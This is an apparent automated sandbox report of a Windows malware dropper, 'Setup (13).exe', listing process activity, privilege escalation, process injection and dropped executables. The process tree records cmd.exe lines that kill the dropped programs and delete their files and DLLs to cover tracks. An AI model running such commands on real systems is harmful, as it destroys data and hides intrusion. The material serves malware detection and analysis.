WinHttp.WinHttpRequest.5) HTTP User-Agent header 355 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 367 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 373 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 429 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 400 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 202 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 311 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 368 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 430 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 174 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 372 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup (13).exeEsplorarne.exe.comWerFault.exeGZCE7lNx2wr8c3GHhY6VpQGL.exeWerFault.exepid process 3968 Setup (13).exe 3968 Setup (13).exe 3768 Esplorarne.exe.com 3768 Esplorarne.exe.com 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 840 840 840 840 840 840 840 840 840 840 840 840 840 840 840 840 840 840 840 3784 GZCE7lNx2wr8c3GHhY6VpQGL.exe 3784 GZCE7lNx2wr8c3GHhY6VpQGL.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe 4132 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2504 -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
GZCE7lNx2wr8c3GHhY6VpQGL.exelV0cLJRjBoCNp3_nrE9Ro2WP.exe0cec99sYPHC4JtcYL6Dyhoy2.exeEsplorarne.exe.comexplorer.exeexplorer.exeexplorer.exeexplorer.exepid process 3784 GZCE7lNx2wr8c3GHhY6VpQGL.exe 7048 lV0cLJRjBoCNp3_nrE9Ro2WP.exe 6792 0cec99sYPHC4JtcYL6Dyhoy2.exe 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 2504 6828 Esplorarne.exe.com 7868 explorer.exe 7868 explorer.exe 6860 explorer.exe 6860 explorer.exe 2572 explorer.exe 2572 explorer.exe 8356 explorer.exe 8356 explorer.exe 2572 explorer.exe 2572 explorer.exe 8356 explorer.exe 8356 explorer.exe 7868 explorer.exe 7868 explorer.exe 6860 explorer.exe 6860 explorer.exe 6860 explorer.exe 6860 explorer.exe 2572 explorer.exe 2572 explorer.exe 8356 explorer.exe 8356 explorer.exe 7868 explorer.exe 7868 explorer.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
1700239.exepid process 3104 1700239.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
xRxZGAoA5TFUm46yqDqWyLKe.exeHvRdJvYAphkP2BshkAtGWhQa.exexSrL1QRuFcmsVaGKJ6KvkP1I.exeWerFault.exej_16kKcB4jVgGPLP0gdjWZI_.exeCW9iZUPnTLWFDj2aH5MN_4dK.exesr1e6evbYvPSPR1h8l_TGwVu.exeMh9JAL13r0v0BmNX5FgEGHKj.exeVQF2oO7acvvovPhrwKWLMcyD.exeGcpFYsjX4UKHyKnErFNxlep5.exetaskkill.exeWerFault.exeWerFault.exeWerFault.exemgBOJpLraGK2Wlg_GsNS8POH.exexRxZGAoA5TFUm46yqDqWyLKe.exeWerFault.exerundll32.exesvchost.exetaskkill.exesvchost.exedescription pid process Token: SeDebugPrivilege 3768 xRxZGAoA5TFUm46yqDqWyLKe.exe Token: SeDebugPrivilege 2584 HvRdJvYAphkP2BshkAtGWhQa.exe Token: SeDebugPrivilege 3736 xSrL1QRuFcmsVaGKJ6KvkP1I.exe Token: SeRestorePrivilege 4540 WerFault.exe Token: SeBackupPrivilege 4540 WerFault.exe Token: SeDebugPrivilege 4540 WerFault.exe Token: SeDebugPrivilege 4812 j_16kKcB4jVgGPLP0gdjWZI_.exe Token: SeDebugPrivilege 2772 CW9iZUPnTLWFDj2aH5MN_4dK.exe Token: SeDebugPrivilege 4532 sr1e6evbYvPSPR1h8l_TGwVu.exe Token: SeDebugPrivilege 2172 Mh9JAL13r0v0BmNX5FgEGHKj.exe Token: SeDebugPrivilege 2696 VQF2oO7acvvovPhrwKWLMcyD.exe Token: SeDebugPrivilege 2660 GcpFYsjX4UKHyKnErFNxlep5.exe Token: SeDebugPrivilege 840 Token: SeDebugPrivilege 4572 taskkill.exe Token: SeDebugPrivilege 4132 WerFault.exe Token: SeDebugPrivilege 1732 WerFault.exe Token: SeDebugPrivilege 2072 WerFault.exe Token: SeDebugPrivilege 4072 mgBOJpLraGK2Wlg_GsNS8POH.exe Token: SeDebugPrivilege 5320 xRxZGAoA5TFUm46yqDqWyLKe.exe Token: SeDebugPrivilege 6040 WerFault.exe Token: SeShutdownPrivilege 2504 Token: SeCreatePagefilePrivilege 2504 Token: SeShutdownPrivilege 2504 Token: SeCreatePagefilePrivilege 2504 Token: SeShutdownPrivilege 2504 Token: SeCreatePagefilePrivilege 2504 Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 2536 svchost.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeShutdownPrivilege 2504 Token: SeCreatePagefilePrivilege 2504 Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 4412 rundll32.exe Token: SeDebugPrivilege 5796 taskkill.exe Token: SeAssignPrimaryTokenPrivilege 2548 svchost.exe Token: SeIncreaseQuotaPrivilege 2548 svchost.exe Token: SeSecurityPrivilege 2548 svchost.exe Token: SeTakeOwnershipPrivilege 2548 svchost.exe Token: SeLoadDriverPrivilege 2548 svchost.exe Token: SeSystemtimePrivilege 2548 svchost.exe Token: SeBackupPrivilege 2548 svchost.exe Token: SeRestorePrivilege 2548 svchost.exe Token: SeShutdownPrivilege 2548 svchost.exe Token: SeSystemEnvironmentPrivilege 2548 svchost.exe Token: SeUndockPrivilege 2548 svchost.exe Token: SeManageVolumePrivilege 2548 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2548 svchost.exe Token: SeIncreaseQuotaPrivilege 2548 svchost.exe Token: SeSecurityPrivilege 2548 svchost.exe Token: SeTakeOwnershipPrivilege 2548 svchost.exe Token: SeLoadDriverPrivilege 2548 svchost.exe Token: SeSystemtimePrivilege 2548 svchost.exe Token: SeBackupPrivilege 2548 svchost.exe Token: SeRestorePrivilege 2548 svchost.exe Token: SeShutdownPrivilege 2548 svchost.exe Token: SeSystemEnvironmentPrivilege 2548 svchost.exe Token: SeUndockPrivilege 2548 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
3bddbg9jWr7Ig8wwsIl8rRbl.tmpCleaner Installation.exeInlog.tmpWEATHER Manager.tmpw32tm.exeStats.tmpSetup.exezihUYffJhyVU5DT9YIToGAck.tmpEsplorarne.exe.comSetup.tmpultramediaburner.tmpEsplorarne.exe.compid process 2596 3bddbg9jWr7Ig8wwsIl8rRbl.tmp 5100 Cleaner Installation.exe 2504 2504 4136 Inlog.tmp 4356 WEATHER Manager.tmp 4620 w32tm.exe 1660 Stats.tmp 6280 Setup.exe 6804 zihUYffJhyVU5DT9YIToGAck.tmp 8116 Esplorarne.exe.com 7176 Setup.tmp 4932 ultramediaburner.tmp 8124 Esplorarne.exe.com 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp 7176 Setup.tmp -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
7F4.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comConhost.exeEsplorarne.exe.comEsplorarne.exe.comMicrosoftEdgeCP.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.compid process 8680 7F4.exe 8680 7F4.exe 8680 7F4.exe 9068 Esplorarne.exe.com 9068 Esplorarne.exe.com 9068 Esplorarne.exe.com 4952 Esplorarne.exe.com 4952 Esplorarne.exe.com 4952 Esplorarne.exe.com 6888 Esplorarne.exe.com 6888 Esplorarne.exe.com 6888 Esplorarne.exe.com 8580 Esplorarne.exe.com 8580 Esplorarne.exe.com 8580 Esplorarne.exe.com 8444 Esplorarne.exe.com 8444 Esplorarne.exe.com 8444 Esplorarne.exe.com 4676 Conhost.exe 4676 Conhost.exe 4676 Conhost.exe 8256 Esplorarne.exe.com 8256 Esplorarne.exe.com 8256 Esplorarne.exe.com 5716 Esplorarne.exe.com 5716 Esplorarne.exe.com 5716 Esplorarne.exe.com 8800 MicrosoftEdgeCP.exe 8800 MicrosoftEdgeCP.exe 8800 MicrosoftEdgeCP.exe 2544 Esplorarne.exe.com 2544 Esplorarne.exe.com 2544 Esplorarne.exe.com 6484 Esplorarne.exe.com 6484 Esplorarne.exe.com 6484 Esplorarne.exe.com 1752 Esplorarne.exe.com 1752 Esplorarne.exe.com 1752 Esplorarne.exe.com 2856 Esplorarne.exe.com 2856 Esplorarne.exe.com 2856 Esplorarne.exe.com 6956 Esplorarne.exe.com 6956 Esplorarne.exe.com 6956 Esplorarne.exe.com 3564 Esplorarne.exe.com 3564 Esplorarne.exe.com 3564 Esplorarne.exe.com 4464 Esplorarne.exe.com 4464 Esplorarne.exe.com 4464 Esplorarne.exe.com 9144 Esplorarne.exe.com 9144 Esplorarne.exe.com 9144 Esplorarne.exe.com 388 Esplorarne.exe.com 388 Esplorarne.exe.com 388 Esplorarne.exe.com 8984 Esplorarne.exe.com 8984 Esplorarne.exe.com 8984 Esplorarne.exe.com 6636 Esplorarne.exe.com 6636 Esplorarne.exe.com 6636 Esplorarne.exe.com 4632 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 23 IoCs
Processes:
builder.exeMicrosoftEdge.execmd.exesc.exeMaskVPNUpdate.exeEsplorarne.exe.comMicrosoftEdgeCP.exeEsplorarne.exe.comEsplorarne.exe.comMicrosoftEdgeCP.exelsass.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 5928 builder.exe 2504 6564 MicrosoftEdge.exe 972 cmd.exe 6392 sc.exe 8844 MaskVPNUpdate.exe 8528 Esplorarne.exe.com 8800 MicrosoftEdgeCP.exe 8272 Esplorarne.exe.com 8800 MicrosoftEdgeCP.exe 6012 Esplorarne.exe.com 3064 MicrosoftEdgeCP.exe 3064 MicrosoftEdgeCP.exe 2736 lsass.exe 1416 MicrosoftEdge.exe 5456 MicrosoftEdgeCP.exe 5456 MicrosoftEdgeCP.exe 5144 MicrosoftEdge.exe 5384 MicrosoftEdgeCP.exe 5384 MicrosoftEdgeCP.exe 9060 MicrosoftEdge.exe 64 MicrosoftEdgeCP.exe 64 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup (13).exedescription pid process target process PID 3968 wrote to memory of 1412 3968 Setup (13).exe lscm9tUiznW_ZuLtt7SqvXzl.exe PID 3968 wrote to memory of 1412 3968 Setup (13).exe lscm9tUiznW_ZuLtt7SqvXzl.exe PID 3968 wrote to memory of 1412 3968 Setup (13).exe lscm9tUiznW_ZuLtt7SqvXzl.exe PID 3968 wrote to memory of 2804 3968 Setup (13).exe 4b5m9Xjbeh4Y9rTVY8V4famT.exe PID 3968 wrote to memory of 2804 3968 Setup (13).exe 4b5m9Xjbeh4Y9rTVY8V4famT.exe PID 3968 wrote to memory of 2804 3968 Setup (13).exe 4b5m9Xjbeh4Y9rTVY8V4famT.exe PID 3968 wrote to memory of 2240 3968 Setup (13).exe 9NeY7wDiJGhrvsW_GspXT3lp.exe PID 3968 wrote to memory of 2240 3968 Setup (13).exe 9NeY7wDiJGhrvsW_GspXT3lp.exe PID 3968 wrote to memory of 2240 3968 Setup (13).exe 9NeY7wDiJGhrvsW_GspXT3lp.exe PID 3968 wrote to memory of 2172 3968 Setup (13).exe Mh9JAL13r0v0BmNX5FgEGHKj.exe PID 3968 wrote to memory of 2172 3968 Setup (13).exe Mh9JAL13r0v0BmNX5FgEGHKj.exe PID 3968 wrote to memory of 2172 3968 Setup (13).exe Mh9JAL13r0v0BmNX5FgEGHKj.exe PID 3968 wrote to memory of 3784 3968 Setup (13).exe GZCE7lNx2wr8c3GHhY6VpQGL.exe PID 3968 wrote to memory of 3784 3968 Setup (13).exe GZCE7lNx2wr8c3GHhY6VpQGL.exe PID 3968 wrote to memory of 3784 3968 Setup (13).exe GZCE7lNx2wr8c3GHhY6VpQGL.exe PID 3968 wrote to memory of 4092 3968 Setup (13).exe BOa2qC4wspxHZVE1pYCFRlSJ.exe PID 3968 wrote to memory of 4092 3968 Setup (13).exe BOa2qC4wspxHZVE1pYCFRlSJ.exe PID 3968 wrote to memory of 3220 3968 Setup (13).exe sr1e6evbYvPSPR1h8l_TGwVu.exe PID 3968 wrote to memory of 3220 3968 Setup (13).exe sr1e6evbYvPSPR1h8l_TGwVu.exe PID 3968 wrote to memory of 3220 3968 Setup (13).exe sr1e6evbYvPSPR1h8l_TGwVu.exe PID 3968 wrote to memory of 2508 3968 Setup (13).exe iHIn3Sm9ab4PCPMlOJLksIeI.exe PID 3968 wrote to memory of 2508 3968 Setup (13).exe iHIn3Sm9ab4PCPMlOJLksIeI.exe PID 3968 wrote to memory of 2100 3968 Setup (13).exe C5r_nTDxijl_qNhbR__JA8UL.exe PID 3968 wrote to memory of 2100 3968 Setup (13).exe C5r_nTDxijl_qNhbR__JA8UL.exe PID 3968 wrote to memory of 2100 3968 Setup (13).exe C5r_nTDxijl_qNhbR__JA8UL.exe PID 3968 wrote to memory of 2584 3968 Setup (13).exe HvRdJvYAphkP2BshkAtGWhQa.exe PID 3968 wrote to memory of 2584 3968 Setup (13).exe HvRdJvYAphkP2BshkAtGWhQa.exe PID 3968 wrote to memory of 2660 3968 Setup (13).exe GcpFYsjX4UKHyKnErFNxlep5.exe PID 3968 wrote to memory of 2660 3968 Setup (13).exe GcpFYsjX4UKHyKnErFNxlep5.exe PID 3968 wrote to memory of 2660 3968 Setup (13).exe GcpFYsjX4UKHyKnErFNxlep5.exe PID 3968 wrote to memory of 1944 3968 Setup (13).exe YtTnmDnMr8kYIzzObFT55Rkd.exe PID 3968 wrote to memory of 1944 3968 Setup (13).exe YtTnmDnMr8kYIzzObFT55Rkd.exe PID 3968 wrote to memory of 1944 3968 Setup (13).exe YtTnmDnMr8kYIzzObFT55Rkd.exe PID 3968 wrote to memory of 1912 3968 Setup (13).exe j_16kKcB4jVgGPLP0gdjWZI_.exe PID 3968 wrote to memory of 1912 3968 Setup (13).exe j_16kKcB4jVgGPLP0gdjWZI_.exe PID 3968 wrote to memory of 1912 3968 Setup (13).exe j_16kKcB4jVgGPLP0gdjWZI_.exe PID 3968 wrote to memory of 4072 3968 Setup (13).exe mgBOJpLraGK2Wlg_GsNS8POH.exe PID 3968 wrote to memory of 4072 3968 Setup (13).exe mgBOJpLraGK2Wlg_GsNS8POH.exe PID 3968 wrote to memory of 4072 3968 Setup (13).exe mgBOJpLraGK2Wlg_GsNS8POH.exe PID 3968 wrote to memory of 3736 3968 Setup (13).exe xSrL1QRuFcmsVaGKJ6KvkP1I.exe PID 3968 wrote to memory of 3736 3968 Setup (13).exe xSrL1QRuFcmsVaGKJ6KvkP1I.exe PID 3968 wrote to memory of 3736 3968 Setup (13).exe xSrL1QRuFcmsVaGKJ6KvkP1I.exe PID 3968 wrote to memory of 484 3968 Setup (13).exe Xq_nEPqQVaJIj4O11jOJH7Fl.exe PID 3968 wrote to memory of 484 3968 Setup (13).exe Xq_nEPqQVaJIj4O11jOJH7Fl.exe PID 3968 wrote to memory of 484 3968 Setup (13).exe Xq_nEPqQVaJIj4O11jOJH7Fl.exe PID 3968 wrote to memory of 3768 3968 Setup (13).exe xRxZGAoA5TFUm46yqDqWyLKe.exe PID 3968 wrote to memory of 3768 3968 Setup (13).exe xRxZGAoA5TFUm46yqDqWyLKe.exe PID 3968 wrote to memory of 2696 3968 Setup (13).exe VQF2oO7acvvovPhrwKWLMcyD.exe PID 3968 wrote to memory of 2696 3968 Setup (13).exe VQF2oO7acvvovPhrwKWLMcyD.exe PID 3968 wrote to memory of 2696 3968 Setup (13).exe VQF2oO7acvvovPhrwKWLMcyD.exe PID 3968 wrote to memory of 2684 3968 Setup (13).exe tuuN5KFkdh6HTJMT2aKyIIjj.exe PID 3968 wrote to memory of 2684 3968 Setup (13).exe tuuN5KFkdh6HTJMT2aKyIIjj.exe PID 3968 wrote to memory of 2684 3968 Setup (13).exe tuuN5KFkdh6HTJMT2aKyIIjj.exe PID 3968 wrote to memory of 2628 3968 Setup (13).exe zGFs3qgZ52GcHMqEBczEQ9x9.exe PID 3968 wrote to memory of 2628 3968 Setup (13).exe zGFs3qgZ52GcHMqEBczEQ9x9.exe PID 3968 wrote to memory of 2628 3968 Setup (13).exe zGFs3qgZ52GcHMqEBczEQ9x9.exe PID 3968 wrote to memory of 2772 3968 Setup (13).exe CW9iZUPnTLWFDj2aH5MN_4dK.exe PID 3968 wrote to memory of 2772 3968 Setup (13).exe CW9iZUPnTLWFDj2aH5MN_4dK.exe PID 3968 wrote to memory of 2772 3968 Setup (13).exe CW9iZUPnTLWFDj2aH5MN_4dK.exe PID 3968 wrote to memory of 1392 3968 Setup (13).exe ySzhlkxv6lvVdaZGAMZc3MjG.exe PID 3968 wrote to memory of 1392 3968 Setup (13).exe ySzhlkxv6lvVdaZGAMZc3MjG.exe PID 3968 wrote to memory of 1392 3968 Setup (13).exe ySzhlkxv6lvVdaZGAMZc3MjG.exe PID 3968 wrote to memory of 1184 3968 Setup (13).exe sbqPAgkI_05eWSEnnOqyIFuT.exe PID 3968 wrote to memory of 1184 3968 Setup (13).exe sbqPAgkI_05eWSEnnOqyIFuT.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\afgfbwiC:\Users\Admin\AppData\Roaming\afgfbwi2⤵
-
C:\Users\Admin\AppData\Roaming\drgfbwiC:\Users\Admin\AppData\Roaming\drgfbwi2⤵
-
C:\Users\Admin\AppData\Roaming\ivgfbwiC:\Users\Admin\AppData\Roaming\ivgfbwi2⤵
-
C:\Users\Admin\AppData\Local\Temp\Setup (13).exe"C:\Users\Admin\AppData\Local\Temp\Setup (13).exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\sr1e6evbYvPSPR1h8l_TGwVu.exe"C:\Users\Admin\Documents\sr1e6evbYvPSPR1h8l_TGwVu.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\sr1e6evbYvPSPR1h8l_TGwVu.exeC:\Users\Admin\Documents\sr1e6evbYvPSPR1h8l_TGwVu.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\BOa2qC4wspxHZVE1pYCFRlSJ.exe"C:\Users\Admin\Documents\BOa2qC4wspxHZVE1pYCFRlSJ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\GZCE7lNx2wr8c3GHhY6VpQGL.exe"C:\Users\Admin\Documents\GZCE7lNx2wr8c3GHhY6VpQGL.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe"C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\9NeY7wDiJGhrvsW_GspXT3lp.exe"C:\Users\Admin\Documents\9NeY7wDiJGhrvsW_GspXT3lp.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 3883⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 4283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 4083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 6523⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 6203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 6963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 6643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 7563⤵
- Program crash
-
C:\Users\Admin\Documents\9NeY7wDiJGhrvsW_GspXT3lp.exe"C:\Users\Admin\Documents\9NeY7wDiJGhrvsW_GspXT3lp.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Documents\4b5m9Xjbeh4Y9rTVY8V4famT.exe"C:\Users\Admin\Documents\4b5m9Xjbeh4Y9rTVY8V4famT.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 4763⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\lscm9tUiznW_ZuLtt7SqvXzl.exe"C:\Users\Admin\Documents\lscm9tUiznW_ZuLtt7SqvXzl.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\lscm9tUiznW_ZuLtt7SqvXzl.exe"C:\Users\Admin\Documents\lscm9tUiznW_ZuLtt7SqvXzl.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\iHIn3Sm9ab4PCPMlOJLksIeI.exe"C:\Users\Admin\Documents\iHIn3Sm9ab4PCPMlOJLksIeI.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\C5r_nTDxijl_qNhbR__JA8UL.exe"C:\Users\Admin\Documents\C5r_nTDxijl_qNhbR__JA8UL.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im C5r_nTDxijl_qNhbR__JA8UL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\C5r_nTDxijl_qNhbR__JA8UL.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im C5r_nTDxijl_qNhbR__JA8UL.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Loads dropped DLL
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\HvRdJvYAphkP2BshkAtGWhQa.exe"C:\Users\Admin\Documents\HvRdJvYAphkP2BshkAtGWhQa.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\ssqq.exe"C:\Users\Admin\AppData\Local\Temp\ssqq.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\GcpFYsjX4UKHyKnErFNxlep5.exe"C:\Users\Admin\Documents\GcpFYsjX4UKHyKnErFNxlep5.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe"C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exeC:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exeC:\Users\Admin\Documents\j_16kKcB4jVgGPLP0gdjWZI_.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\YtTnmDnMr8kYIzzObFT55Rkd.exe"C:\Users\Admin\Documents\YtTnmDnMr8kYIzzObFT55Rkd.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "YtTnmDnMr8kYIzzObFT55Rkd.exe" /f & erase "C:\Users\Admin\Documents\YtTnmDnMr8kYIzzObFT55Rkd.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "YtTnmDnMr8kYIzzObFT55Rkd.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\xRxZGAoA5TFUm46yqDqWyLKe.exe"C:\Users\Admin\Documents\xRxZGAoA5TFUm46yqDqWyLKe.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\xRxZGAoA5TFUm46yqDqWyLKe.exe"C:\Users\Admin\Documents\xRxZGAoA5TFUm46yqDqWyLKe.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
